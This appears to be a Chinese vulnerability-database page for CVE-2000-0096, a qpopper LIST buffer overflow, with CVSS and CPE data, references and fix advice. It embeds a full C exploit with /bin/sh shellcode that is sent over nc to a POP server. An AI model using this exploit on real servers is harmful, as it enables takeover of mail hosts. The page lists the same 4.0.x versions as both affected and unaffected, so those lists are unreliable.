CVE-2000-0096
CVSS7.2
发布时间 :2000-01-26 00:00:00
修订时间 :2008-09-10 15:02:54
NMCOES    

[原文]Buffer overflow in qpopper 3.0 beta versions allows local users to gain privileges via a long LIST command.


[CNNVD]Qualcomm qpopper 'LIST'缓冲区溢出漏洞(CNNVD-200001-055)

        qpopper 3.0测试版存在缓冲区溢出漏洞。本地用户借助超长LIST命令提升特权。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:qualcomm:qpopper:3.0beta17
cpe:/a:qualcomm:qpopper:3.0beta16
cpe:/a:qualcomm:qpopper:3.0beta28
cpe:/a:qualcomm:qpopper:3.0beta20
cpe:/a:qualcomm:qpopper:3.0beta1
cpe:/a:qualcomm:qpopper:3.0beta14
cpe:/a:qualcomm:qpopper:3.0
cpe:/a:qualcomm:qpopper:3.0beta25
cpe:/a:qualcomm:qpopper:3.0beta19
cpe:/a:qualcomm:qpopper:3.0beta3
cpe:/a:qualcomm:qpopper:3.0beta4
cpe:/a:qualcomm:qpopper:3.0beta18
cpe:/a:qualcomm:qpopper:3.0beta7
cpe:/a:qualcomm:qpopper:3.0beta29
cpe:/a:qualcomm:qpopper:3.0beta24
cpe:/a:qualcomm:qpopper:3.0beta8
cpe:/a:qualcomm:qpopper:3.0beta15
cpe:/a:qualcomm:qpopper:3.0beta11
cpe:/a:qualcomm:qpopper:3.0beta26
cpe:/a:qualcomm:qpopper:3.0beta23
cpe:/a:qualcomm:qpopper:3.0beta13
cpe:/a:qualcomm:qpopper:3.0beta12
cpe:/a:qualcomm:qpopper:3.0beta6
cpe:/a:qualcomm:qpopper:3.0beta21
cpe:/a:qualcomm:qpopper:3.0beta2
cpe:/a:qualcomm:qpopper:3.0beta22
cpe:/a:qualcomm:qpopper:3.0beta9
cpe:/a:qualcomm:qpopper:3.0beta10
cpe:/a:qualcomm:qpopper:3.0beta5
cpe:/a:qualcomm:qpopper:3.0beta27

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0096
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0096
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200001-055
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/948
(UNKNOWN)  BID  948

- 漏洞信息

Qualcomm qpopper 'LIST'缓冲区溢出漏洞
高危 缓冲区溢出
2000-01-26 00:00:00 2005-10-20 00:00:00
远程※本地  
        qpopper 3.0测试版存在缓冲区溢出漏洞。本地用户借助超长LIST命令提升特权。

- 公告与补丁

        The vendor released fixes to address this issue. Please see the references section for further information.

- 漏洞信息 (19729)

Qualcomm qpopper 3.0 'LIST' Buffer Overflow Vulnerability (EDBID:19729)
linux remote
2000-01-10 Verified
0 Zhodiac
N/A [点击下载]
source: http://www.securityfocus.com/bid/948/info

A remotely exploitable buffer-overflow vulnerability affects Qualcomm's 'qpopper' daemon. This issue allows users already in possession of a username and password for a POP account to compromise the server running the qpopper daemon.

The problem lies in the code that handles the 'LIST' command available to logged-in users. By providing an overly long argument, an attacker may cause a buffer to overflow. As a result, the attacker can gain access with the user ID (UID) of the user whose account is being used for the attack and with the group ID (GID) mail.

This will allow remote attackers to access the server itself and possibly (depending on how the computer is configured) to read other users' mail via the GID mail. 

/*
 * !Hispahack Research Team  
 * http://hispahack.ccc.de
 *
 * By Zhodiac <zhodiac@softhome.net>
 *
 * Linux (x86) Qpopper xploit 3.0beta29 or lower (not 2.53)
 * Overflow at pop_list()->pop_msg()
 *
 * Tested: 3.0beta28  offset=0
 *         3.0beta26  offset=0
 *         3.0beta25  offset=0
 *
 * #include <standar/disclaimer.h>
 *
 * This code is dedicated to my love [CrAsH]] and to all the people who
 * were raided in Spain in the last few days.
 *
 * Madrid 10/1/2000
 *
 */

#include <stdio.h>
  
#define BUFFERSIZE 1004
#define NOP 0x90
#define OFFSET 0xbfffd9c4
  
char shellcode[]=  
 "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89"
 "\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89"
 "\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/bin/sh";

  
void usage(char *progname) {
 fprintf(stderr,"Usage: (%s <login> <password> [<offset>]; cat) | nc <target> 110",progname);
 exit(1);
} 

int main(int argc, char **argv) {
char *ptr,buffer[BUFFERSIZE];
unsigned long *long_ptr,offset=OFFSET;
int aux;
  
 fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n");
 fprintf(stderr,"Qpopper xploit by Zhodiac <zhodiac@softhome.net>\n\n");

 if (argc<3) usage(argv[0]);

 if (argc==4) offset+=atol(argv[3]);

 ptr=buffer;
 memset(ptr,0,sizeof(buffer));
 memset(ptr,NOP,sizeof(buffer)-strlen(shellcode)-16);
 ptr+=sizeof(buffer)-strlen(shellcode)-16;
 memcpy(ptr,shellcode,strlen(shellcode));
 ptr+=strlen(shellcode);
 long_ptr=(unsigned long*)ptr;
 for(aux=0;aux<4;aux++) *(long_ptr++)=offset;
 ptr=(char *)long_ptr;
 *ptr='\0';

 fprintf(stderr,"Buffer size: %d\n",strlen(buffer));
 fprintf(stderr,"Offset: 0x%lx\n\n",offset);
 
 printf("USER %s\n",argv[1]);
 sleep(1);
 printf("PASS %s\n",argv[2]); 
 sleep(1);
 printf("LIST 1 %s\n",buffer);
 sleep(1); 
 printf("uname -a; id\n");
 
 return(0);
}
		

- 漏洞信息

12483
Qpopper LIST Command Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-01-26 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 4.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Qualcomm qpopper 'LIST' Buffer Overflow Vulnerability
Boundary Condition Error 948
Yes Yes
2000-01-26 12:00:00 2006-09-28 06:25:00
This bug was discovered by the !Hispahack Research Team and was posted to the Bugtraq mailing list by Zhodiac <zhodiac@softhome.net> on Wed, 26 Jan 2000.

- 受影响的程序版本

Qualcomm qpopper 3.0 beta9
Qualcomm qpopper 3.0 beta8
Qualcomm qpopper 3.0 beta7
Qualcomm qpopper 3.0 beta6
Qualcomm qpopper 3.0 beta5
Qualcomm qpopper 3.0 beta4
Qualcomm qpopper 3.0 beta3
Qualcomm qpopper 3.0 beta29
Qualcomm qpopper 3.0 beta28
Qualcomm qpopper 3.0 beta27
Qualcomm qpopper 3.0 beta26
Qualcomm qpopper 3.0 beta25
Qualcomm qpopper 3.0 beta24
Qualcomm qpopper 3.0 beta23
Qualcomm qpopper 3.0 beta22
Qualcomm qpopper 3.0 beta21
Qualcomm qpopper 3.0 beta20
Qualcomm qpopper 3.0 beta2
Qualcomm qpopper 3.0 beta19
Qualcomm qpopper 3.0 beta18
Qualcomm qpopper 3.0 beta17
Qualcomm qpopper 3.0 beta16
Qualcomm qpopper 3.0 beta15
Qualcomm qpopper 3.0 beta14
Qualcomm qpopper 3.0 beta13
Qualcomm qpopper 3.0 beta12
Qualcomm qpopper 3.0 beta11
Qualcomm qpopper 3.0 beta10
Qualcomm qpopper 3.0 beta1
Qualcomm qpopper 3.0
Qualcomm qpopper 4.0.8
Qualcomm qpopper 4.0.7
Qualcomm qpopper 4.0.6
Qualcomm qpopper 4.0.5 fc2
Qualcomm qpopper 4.0.5
Qualcomm qpopper 4.0.4
Qualcomm qpopper 4.0.3
+ Caldera OpenServer 5.0.6
+ Caldera OpenServer 5.0.5
Qualcomm qpopper 4.0.2
Qualcomm qpopper 4.0.1
+ RedHat Linux 7.1
+ RedHat Linux 7.0
+ Sun Cobalt RaQ 4
Qualcomm qpopper 4.0 b14
Qualcomm qpopper 4.0 3
Qualcomm qpopper 4.0 2
Qualcomm qpopper 4.0 1
Qualcomm qpopper 4.0
Qualcomm qpopper 3.0 beta31
Qualcomm qpopper 3.0 beta30
Qualcomm qpopper 2.53
Qualcomm qpopper 2.52
Qualcomm qpopper 2.4
Qualcomm qpopper 4.0

- 不受影响的程序版本

Qualcomm qpopper 4.0.8
Qualcomm qpopper 4.0.7
Qualcomm qpopper 4.0.6
Qualcomm qpopper 4.0.5 fc2
Qualcomm qpopper 4.0.5
Qualcomm qpopper 4.0.4
Qualcomm qpopper 4.0.3
+ Caldera OpenServer 5.0.6
+ Caldera OpenServer 5.0.5
Qualcomm qpopper 4.0.2
Qualcomm qpopper 4.0.1
+ RedHat Linux 7.1
+ RedHat Linux 7.0
+ Sun Cobalt RaQ 4
Qualcomm qpopper 4.0 b14
Qualcomm qpopper 4.0 3
Qualcomm qpopper 4.0 2
Qualcomm qpopper 4.0 1
Qualcomm qpopper 4.0
Qualcomm qpopper 3.0 beta31
Qualcomm qpopper 3.0 beta30
Qualcomm qpopper 2.53
Qualcomm qpopper 2.52
Qualcomm qpopper 2.4
Qualcomm qpopper 4.0

- 漏洞讨论

A remotely exploitable buffer-overflow vulnerability affects Qualcomm's 'qpopper' daemon. This issue allows users already in possession of a username and password for a POP account to compromise the server running the qpopper daemon.

The problem lies in the code that handles the 'LIST' command available to logged-in users. By providing an overly long argument, an attacker may cause a buffer to overflow. As a result, the attacker can gain access with the user ID (UID) of the user whose account is being used for the attack and with the group ID (GID) mail.

This will allow remote attackers to access the server itself and possibly (depending on how the computer is configured) to read other users' mail via the GID mail.

- 漏洞利用

An exploit is available:

- 解决方案

The vendor released fixes to address this issue. Please see the references section for further information.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站